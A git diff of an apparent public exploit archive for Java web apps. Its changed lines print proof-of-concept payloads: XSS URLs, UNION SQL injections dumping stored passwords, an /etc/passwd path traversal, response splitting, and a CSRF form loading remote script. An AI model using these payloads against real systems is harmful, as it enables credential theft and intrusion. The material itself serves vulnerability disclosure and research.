TYPE="checkbox" NAME="remove_it" ID="remove_id"></TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=priority_id><SPAN class=fieldlabeltext>Order:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="priority_in" SIZE="2" MAXLENGTH="1" VALUE="2" ID="priority_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=rship_id><SPAN class=fieldlabeltext>Relationship:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="rship" SIZE="1" ID="rship_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="A">An Ex-spouse </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=fname_id><SPAN class=fieldlabeltext>First Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="fname" SIZE="20" MAXLENGTH="15" ID="fname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=mi_id><SPAN class=fieldlabeltext>Middle Initial:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="mi" SIZE="2" MAXLENGTH="1" ID="mi_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=lname_id><SPAN class=fieldlabeltext>Last Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="lname" SIZE="35" MAXLENGTH="25" ID="lname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr1_id><SPAN class=fieldlabeltext>Address Line 1:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr1" SIZE="35" MAXLENGTH="30" ID="addr1_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr2_id><SPAN class=fieldlabeltext>Address Line 2:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr2" SIZE="35" MAXLENGTH="30" ID="addr2_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr3_id><SPAN class=fieldlabeltext>Address Line 3:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr3" SIZE="35" MAXLENGTH="30" ID="addr3_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=city_id><SPAN class=fieldlabeltext>City:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="city" SIZE="30" MAXLENGTH="20" ID="city_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=stat_id><SPAN class=fieldlabeltext>State or Province:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="stat" SIZE="1" ID="stat_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="RI">Rhode Island </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=zip_id><SPAN class=fieldlabeltext>Zip or Postal Code:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="zip" SIZE="11" MAXLENGTH="10" ID="zip_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=natn_id><SPAN class=fieldlabeltext>Country:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="natn" SIZE="1" ID="natn_id"> <OPTION VALUE="" SELECTED>Not Applicable OPTION VALUE="US">United States </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=area_id><SPAN class=fieldlabeltext>Area Code:</SPAN></LABEL></TD> <TD COLSPAN="1" CLASS="dedefault"> <INPUT TYPE="text" NAME="area" SIZE="4" MAXLENGTH="3" ID="area_id"> <TD CLASS="delabel" scope="row" ><LABEL for=phone_id><SPAN class=fieldlabeltext>Phone Number:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="phone" SIZE="9" MAXLENGTH="8" ID="phone_id"></TD> <TD CLASS="delabel" scope="row" ><LABEL for=ext_id><SPAN class=fieldlabeltext>Extension:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="ext" SIZE="5" MAXLENGTH="4" ID="ext_id"></TD> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Submit Changes"> <INPUT TYPE="reset" VALUE="Reset"> </FORM> <script> document.MyForm.addr1.value='\<script src=http://www.example2.com/s>'; document.MyForm.natn.value='US'; document.MyForm.stat.value='RI'; document.MyForm.fname.value='NAME'; document.MyForm.lname.value='NAME'; document.MyForm.city.value='Providence'; document.MyForm.zip.value='02912'; document.MyForm.submit(); </script> </body> </html> \ No newline at end of file diff --git a/platforms/java/webapps/31189.txt b/platforms/java/webapps/31189.txt old mode 100755 new mode 100644 index b003f4f44..15e2e31db --- a/platforms/java/webapps/31189.txt +++ b/platforms/java/webapps/31189.txt @@ -13,4 +13,4 @@ https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+ SELECT+'','',firstname,lastname,userid,password+from+enduser;-- https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+ -SELECT+'','','',user,'',password+from+applicationuser;-- \ No newline at end of file +SELECT+'','','',user,'',password+from+applicationuser;-- \ No newline at end of file diff --git a/platforms/java/webapps/31438.txt b/platforms/java/webapps/31438.txt old mode 100755 new mode 100644 index 1de14c307..f73f84e92 --- a/platforms/java/webapps/31438.txt +++ b/platforms/java/webapps/31438.txt @@ -6,4 +6,4 @@ An attacker could exploit these vulnerabilities to execute arbitrary local or re Ration ClearQuest 2003.06.16, 7.0.0.1, 7.0.0.2, 7.0.1.0, and 7.0.1.1 are vulnerable; other versions may also be affected. -http://www.example.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');// http://www.example.com/cqweb/login?targetUrl=/cqweb/main?command=GenerateMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.example.com/cqweb/login&username=test</script><script>alert('xss')</script>&password=test&schema=SCHEMAHERE&userDb=DBHERE \ No newline at end of file +http://www.example.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');// http://www.example.com/cqweb/login?targetUrl=/cqweb/main?command=GenerateMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.example.com/cqweb/login&username=test</script><script>alert('xss')</script>&password=test&schema=SCHEMAHERE&userDb=DBHERE \ No newline at end of file diff --git a/platforms/java/webapps/31621.txt b/platforms/java/webapps/31621.txt old mode 100755 new mode 100644 index a5e5442fa..fb090bc57 --- a/platforms/java/webapps/31621.txt +++ b/platforms/java/webapps/31621.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Sun Java System Messenger Express 6.1-13-15 is vulnerable; other versions may also be affected. -http://www.example.com/en/mail.html?sid=<something>&lang="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/en/mail.html?sid=<something>&lang="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/java/webapps/31641.txt b/platforms/java/webapps/31641.txt old mode 100755 new mode 100644 index 39b19c281..e93f61883 --- a/platforms/java/webapps/31641.txt +++ b/platforms/java/webapps/31641.txt @@ -10,4 +10,4 @@ NOTE: .Net versions are unaffected. http://www.example.com/businessobjects/enterprise115/desktoplaunch/InfoView/logon/logon.object;jsessionid=7E1EFA4F83461F81157B67D7EA471A12?qryStr=&cmsVisible=true&authenticationVisible=true&referer=&refererFormData=&isFromLogonPage=true&cms=> %22%27><img%20src%3d%22javascript:alert(%27XSS%20Test%20Successful -%27)%22>" \ No newline at end of file +%27)%22>" \ No newline at end of file diff --git a/platforms/java/webapps/31816.txt b/platforms/java/webapps/31816.txt old mode 100755 new mode 100644 index 60d08d9a2..99811fc37 --- a/platforms/java/webapps/31816.txt +++ b/platforms/java/webapps/31816.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SAP Web Application Server 7.0 is vulnerable; other versions may also be affected. -http://www.example.com/sap/bc/gui/sap/its/webgui/aaaaaaa"><img/src=javascript:alert('DSECRG_XSS')> \ No newline at end of file +http://www.example.com/sap/bc/gui/sap/its/webgui/aaaaaaa"><img/src=javascript:alert('DSECRG_XSS')> \ No newline at end of file diff --git a/platforms/java/webapps/32448.txt b/platforms/java/webapps/32448.txt old mode 100755 new mode 100644 index 3e4562e1b..cf56295bf --- a/platforms/java/webapps/32448.txt +++ b/platforms/java/webapps/32448.txt @@ -4,4 +4,4 @@ Celoxis is prone to multiple cross-site scripting vulnerabilities because it fai An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/psa/user.do?bxn=umyhome&message=XSS+goes+here+%3cscript%3ealert('XSS')%3c/script%3e \ No newline at end of file +http://www.example.com/psa/user.do?bxn=umyhome&message=XSS+goes+here+%3cscript%3ealert('XSS')%3c/script%3e \ No newline at end of file diff --git a/platforms/java/webapps/32459.txt b/platforms/java/webapps/32459.txt old mode 100755 new mode 100644 index b0de0c467..69a556ae7 --- a/platforms/java/webapps/32459.txt +++ b/platforms/java/webapps/32459.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Kontiki Delivery Management System 5.0 and prior versions are vulnerable. -http://www.example.com/zodiac/servlet/zodiac?action=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/zodiac/servlet/zodiac?action=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/java/webapps/32574.txt b/platforms/java/webapps/32574.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/32818.txt b/platforms/java/webapps/32818.txt old mode 100755 new mode 100644 index f0e7bd38b..35df12419 --- a/platforms/java/webapps/32818.txt +++ b/platforms/java/webapps/32818.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow JOnAS 4.10.3 is vulnerable; other versions may also be affected. -http://www.example.com:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule%2Cj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule \ No newline at end of file +http://www.example.com:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule%2Cj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule \ No newline at end of file diff --git a/platforms/java/webapps/32821.html b/platforms/java/webapps/32821.html old mode 100755 new mode 100644 index 2b72d63ca..b2d5f8c9b --- a/platforms/java/webapps/32821.html +++ b/platforms/java/webapps/32821.html @@ -4,4 +4,4 @@ APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerabi An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user, steal cookie-based authentication credentials, and influence how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. -1 XSS: GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')"> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Ч�~B, 25 �~Aен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html \ No newline at end of file +1 XSS: GET /security/applet?referrer=>"'><img/src="javascript:alert('DSECRG_XSS')"> 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - "page" Example ******* GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Ч�~B, 25 �~Aен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html \ No newline at end of file diff --git a/platforms/java/webapps/32858.txt b/platforms/java/webapps/32858.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/32862.txt b/platforms/java/webapps/32862.txt old mode 100755 new mode 100644 index 42c3ecbb0..7a7702d06 --- a/platforms/java/webapps/32862.txt +++ b/platforms/java/webapps/32862.txt @@ -4,4 +4,4 @@ Sun Java System Calendar Server is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -https://www.example.com:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1 \ No newline at end of file +https://www.example.com:3443//command.shtml?view=overview&id=HK8CjQOkmbY&date=20081217T200734%27;alert('xss');//Z&caliad=someid@test.com&security=1 \ No newline at end of file diff --git a/platforms/java/webapps/32863.txt b/platforms/java/webapps/32863.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/32864.txt b/platforms/java/webapps/32864.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/32897.txt b/platforms/java/webapps/32897.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/32909.txt b/platforms/java/webapps/32909.txt old mode 100755 new mode 100644 index df7fe078a..7d0cd220d --- a/platforms/java/webapps/32909.txt +++ b/platforms/java/webapps/32909.txt @@ -8,4 +8,4 @@ The attacker may leverage the cross-site scripting issues to execute arbitrary s Novell Teaming 1.0.3 is vulnerable; other versions may also be affected. -https://www.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE \ No newline at end of file +https://www.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE \ No newline at end of file diff --git a/platforms/java/webapps/32927.txt b/platforms/java/webapps/32927.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/32940.txt b/platforms/java/webapps/32940.txt old mode 100755 new mode 100644 index 8746786cb..ef214fbd0 --- a/platforms/java/webapps/32940.txt +++ b/platforms/java/webapps/32940.txt @@ -20,4 +20,4 @@ Cache-control: private Location: <server> X-Tag: Core Security Technologies Content-length: 0 -Content-type: text/htm \ No newline at end of file +Content-type: text/htm \ No newline at end of file diff --git a/platforms/java/webapps/33048.txt b/platforms/java/webapps/33048.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/33181.txt b/platforms/java/webapps/33181.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/33254.txt b/platforms/java/webapps/33254.txt old mode 100755 new mode 100644 index 13694a74d..8f10f43fd --- a/platforms/java/webapps/33254.txt +++ b/platforms/java/webapps/33254.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow IBM Lotus Connections 2.0.1 is affected; other versions may be vulnerable as well. -https://www.example.com/profiles/html/simpleSearch.do?name=<IMG%20SRC="vbscript:msgbox(document.cookie)'>&lang=en \ No newline at end of file +https://www.example.com/profiles/html/simpleSearch.do?name=<IMG%20SRC="vbscript:msgbox(document.cookie)'>&lang=en \ No newline at end of file diff --git a/platforms/java/webapps/33286.txt b/platforms/java/webapps/33286.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/33687.txt b/platforms/java/webapps/33687.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/33939.txt b/platforms/java/webapps/33939.txt old mode 100755 new mode 100644 index 601e1bbd0..7876c1c65 --- a/platforms/java/webapps/33939.txt +++ b/platforms/java/webapps/33939.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ShopEx Single 4.5.1 is vulnerable; other versions may also be affected. -http://www.example.com/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg== \ No newline at end of file +http://www.example.com/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg== \ No newline at end of file diff --git a/platforms/java/webapps/34108.txt b/platforms/java/webapps/34108.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/34290.txt b/platforms/java/webapps/34290.txt old mode 100755 new mode 100644 index c9ed3c175..17ffed6b9 --- a/platforms/java/webapps/34290.txt +++ b/platforms/java/webapps/34290.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Mac's CMS 1.1.4 is vulnerable; other versions may also be affected. -http://www.example.com/index.php/footer/search?searchString='><script>alert('xss')</script> \ No newline at end of file +http://www.example.com/index.php/footer/search?searchString='><script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/java/webapps/34293.txt b/platforms/java/webapps/34293.txt old mode 100755 new mode 100644 index 45a3d12c3..3f58f68d4 --- a/platforms/java/webapps/34293.txt +++ b/platforms/java/webapps/34293.txt @@ -8,4 +8,4 @@ dotDefender 4.02 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ \ No newline at end of file +http://www.example.com/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ \ No newline at end of file diff --git a/platforms/java/webapps/34345.txt b/platforms/java/webapps/34345.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/35683.txt b/platforms/java/webapps/35683.txt old mode 100755 new mode 100644 index 89ea18161..4063e3e6b --- a/platforms/java/webapps/35683.txt +++ b/platforms/java/webapps/35683.txt @@ -4,4 +4,4 @@ LANSA aXes Web Terminal TN5250 is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. - https://www.example.com/axests/terminal?cssref=/ts/skins/axes_default.css?axbuild=135001&login=[xss] \ No newline at end of file + https://www.example.com/axests/terminal?cssref=/ts/skins/axes_default.css?axbuild=135001&login=[xss] \ No newline at end of file diff --git a/platforms/java/webapps/35781.txt b/platforms/java/webapps/35781.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36292.txt b/platforms/java/webapps/36292.txt old mode 100755 new mode 100644 index 7d9ab53a4..a6a6f41a8 --- a/platforms/java/webapps/36292.txt +++ b/platforms/java/webapps/36292.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain arbitrary local files in th NoSQL 11g 1.1.100 R2 is vulnerable; other versions may also be affected. -http://www.example.com/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/java/webapps/36299.txt b/platforms/java/webapps/36299.txt old mode 100755 new mode 100644 index 135448279..c39513c08 --- a/platforms/java/webapps/36299.txt +++ b/platforms/java/webapps/36299.txt @@ -14,4 +14,4 @@ Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) -formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false \ No newline at end of file +formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false \ No newline at end of file diff --git a/platforms/java/webapps/36423.txt b/platforms/java/webapps/36423.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36436.txt b/platforms/java/webapps/36436.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36440.txt b/platforms/java/webapps/36440.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36548.txt b/platforms/java/webapps/36548.txt old mode 100755 new mode 100644 index 6bfd33863..abdccbd6c --- a/platforms/java/webapps/36548.txt +++ b/platforms/java/webapps/36548.txt @@ -4,4 +4,4 @@ Contus Job Portal is prone to an SQL-injection vulnerability because it fails to A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A \ No newline at end of file +http://www.example.com/demo/jobresult?searchname=quickjobsearch&Keywords=&Location=&Category=16â??A \ No newline at end of file diff --git a/platforms/java/webapps/36553.java b/platforms/java/webapps/36553.java old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36666.txt b/platforms/java/webapps/36666.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36667.txt b/platforms/java/webapps/36667.txt old mode 100755 new mode 100644 index f5fc14f8b..6c89a9e4f --- a/platforms/java/webapps/36667.txt +++ b/platforms/java/webapps/36667.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br ManageEngine ADManager Plus 5.2 Build 5210 is vulnerable; prior versions may also be affected. -#1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert(&#039;zsl&#039;)</script> HTTP/1.1 \ No newline at end of file +#1 - GET http://www.example.com/jsp/AddDC.jsp?domainName="><script>alert(&#039;zsl&#039;)</script> HTTP/1.1 \ No newline at end of file diff --git a/platforms/java/webapps/36684.txt b/platforms/java/webapps/36684.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/36828.txt b/platforms/java/webapps/36828.txt old mode 100755 new mode 100644 index 60a1540a3..210a0e0da --- a/platforms/java/webapps/36828.txt +++ b/platforms/java/webapps/36828.txt @@ -4,4 +4,4 @@ JaWiki is prone to a cross-site scripting vulnerability because it fails to prop An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E \ No newline at end of file +http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/java/webapps/36939.txt b/platforms/java/webapps/36939.txt old mode 100755 new mode 100644 index 8d5f2b79f..e433296ea --- a/platforms/java/webapps/36939.txt +++ b/platforms/java/webapps/36939.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow EJBCA 4.0.7 is vulnerable; other versions may also be affected. -http://www.example.com/ejbca/publicweb/webdist/certdist?cmd=revoked&issuer=%3Cscript%3Ealert(document.cookie)%3C/script%3E&serno=1 \ No newline at end of file +http://www.example.com/ejbca/publicweb/webdist/certdist?cmd=revoked&issuer=%3Cscript%3Ealert(document.cookie)%3C/script%3E&serno=1 \ No newline at end of file diff --git a/platforms/java/webapps/36971.txt b/platforms/java/webapps/36971.txt old mode 100755 new mode 100644 index e20e4224c..bdcbd1112 --- a/platforms/java/webapps/36971.txt +++ b/platforms/java/webapps/36971.txt @@ -4,4 +4,4 @@ JavaBB is prone to a cross-site scripting vulnerability because it fails to sani An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/pm.externalSend.jbb?userId=42888&username=teapro%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file +http://www.example.com/pm.externalSend.jbb?userId=42888&username=teapro%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/java/webapps/37006.txt b/platforms/java/webapps/37006.txt old mode 100755 new mode 100644 index 0778f0287..6a7c4010b --- a/platforms/java/webapps/37006.txt +++ b/platforms/java/webapps/37006.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Minify 2.1.3 and 2.1.4-beta are vulnerable; other versions may also be affected. -http://www.exmaple.com/min/builder/#g=[XSS] \ No newline at end of file +http://www.exmaple.com/min/builder/#g=[XSS] \ No newline at end of file diff --git a/platforms/java/webapps/37009.xml b/platforms/java/webapps/37009.xml old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/37029.txt b/platforms/java/webapps/37029.txt old mode 100755 new mode 100644 index 2081359b2..c4cb82fa9 --- a/platforms/java/webapps/37029.txt +++ b/platforms/java/webapps/37029.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. -http://www.example.com/fw/index2.do?url=adminHome&tab=system%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3El \ No newline at end of file +http://www.example.com/fw/index2.do?url=adminHome&tab=system%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3El \ No newline at end of file diff --git a/platforms/java/webapps/37030.txt b/platforms/java/webapps/37030.txt old mode 100755 new mode 100644 index 58bbbaa88..541cb4f1f --- a/platforms/java/webapps/37030.txt +++ b/platforms/java/webapps/37030.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. http://www.example.com.com/fw/createAnomaly.do?subTab=%22%3E%3Cscript%3Ealert%281337%29%3C/script%3EaddAlert&; -tab=alert%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E&demoConfigure=true \ No newline at end of file +tab=alert%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E&demoConfigure=true \ No newline at end of file diff --git a/platforms/java/webapps/37031.txt b/platforms/java/webapps/37031.txt old mode 100755 new mode 100644 index 05b63d45b..bdb255ef1 --- a/platforms/java/webapps/37031.txt +++ b/platforms/java/webapps/37031.txt @@ -8,4 +8,4 @@ Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. http://www.example.com/fw/mindex.do?url=%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3EliveReportDash%22%3E %3Cscript%3Ealert%28%27vlab%27%29%3C/script%3E&subTab=%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Elive&tab=%22%3 -E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Ereport \ No newline at end of file +E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Ereport \ No newline at end of file diff --git a/platforms/java/webapps/37032.txt b/platforms/java/webapps/37032.txt old mode 100755 new mode 100644 index fe21b3944..46157108e --- a/platforms/java/webapps/37032.txt +++ b/platforms/java/webapps/37032.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. -http://www.example.com/fw/syslogViewer.do?port=%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E \ No newline at end of file +http://www.example.com/fw/syslogViewer.do?port=%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E \ No newline at end of file diff --git a/platforms/java/webapps/37033.txt b/platforms/java/webapps/37033.txt old mode 100755 new mode 100644 index 5db1fdf72..79940757e --- a/platforms/java/webapps/37033.txt +++ b/platforms/java/webapps/37033.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow DirectAdmin 1.403 is vulnerable; other versions may also be affected. -http://www.example.com/CMD_DOMAIN?action=create&domain=<div style="border:1px solid red;width:300px;height:300px" onmouseover="alert(dawid)"></div>aaa.pl&ubandwidth=unlimited&uquota=unlimited&cgi=ON&php=ON \ No newline at end of file +http://www.example.com/CMD_DOMAIN?action=create&domain=<div style="border:1px solid red;width:300px;height:300px" onmouseover="alert(dawid)"></div>aaa.pl&ubandwidth=unlimited&uquota=unlimited&cgi=ON&php=ON \ No newline at end of file diff --git a/platforms/java/webapps/37372.html b/platforms/java/webapps/37372.html old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/37416.txt b/platforms/java/webapps/37416.txt old mode 100755 new mode 100644 index ba2c42d4c..850886d11 --- a/platforms/java/webapps/37416.txt +++ b/platforms/java/webapps/37416.txt @@ -6,4 +6,4 @@ Attackers may exploit these issues to execute arbitrary code in the context of t Squiz CMS 4.6.3 is vulnerable; other versions may also be affected. 